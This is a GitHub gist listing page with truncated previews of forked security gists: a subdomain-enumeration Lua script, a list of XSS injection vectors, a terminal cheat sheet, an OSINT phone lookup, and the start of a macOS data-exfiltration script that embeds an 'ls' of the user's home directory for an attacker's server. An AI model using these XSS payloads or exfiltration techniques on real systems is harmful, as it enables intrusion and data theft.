NihilNomine YagamiShadow
YagamiShadow
/ assetfinder.ads
Created
October 19, 2021 14:41
— forked from sillydadddy/assetfinder.ads
Amass lua scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name = "assetfinder" | |
| type = "ext" | |
| function vertical(ctx, domain) | |
| print("in asset finder") | |
| local cmd = outputdir(ctx) .. "assetfinder --subs-only " .. domain | |
| local data = assert(io.popen(cmd)) | |
| for line in data:lines() do |
YagamiShadow
/ 666_lines_of_XSS_vectors.html
Created
December 6, 2020 02:13
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
YagamiShadow
/ terminal-cheat-sheet.txt
Created
November 29, 2020 02:08
— forked from cferdinandi/terminal-cheat-sheet.txt
Terminal Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Terminal Cheat Sheet | |
| pwd # print working directory | |
| ls # list files in directory | |
| cd # change directory | |
| ~ # home directory | |
| .. # up one directory | |
| - # previous working directory | |
| help # get help | |
| -h # get help |
YagamiShadow
/ phone-search.py
Created
November 22, 2020 00:06
— forked from DevonThomas/phone-search.py
OSINT Phone Search tool inspired by Michael Bazzell's previously public tool.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import webbrowser | |
| areaCode = input("What is the area code of the phone number? ") | |
| middle3 = input("What are the middle 3 digits? ") | |
| last4 = input("What are the last 4 digits? ") | |
| phoneNumber = str(areaCode) + str(middle3) + str(last4) | |
| fourOneOne = "https://www.411.com/phone/" + "1-" + str(areaCode) + "-" + str(middle3) + "-" + str(last4) | |
| webbrowser.open(fourOneOne) |
YagamiShadow
/ data exfil
Created
November 21, 2020 04:55
— forked from tokyoneon/data exfil
Hacking macOS: Use Images to Smuggle Data Through Firewalls
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/ | |
| # `if` statement to detemine if the message is a 'response' one | |
| # This is the command being executed and embedded in the photo. | |
| # Single-quotes are used here to help with escaping special | |
| # characters within the desired command(s). | |
| exfilData='ls -lah "/Users/$USER/"' | |
| # Where the attackers PHP server is located. This needs to be |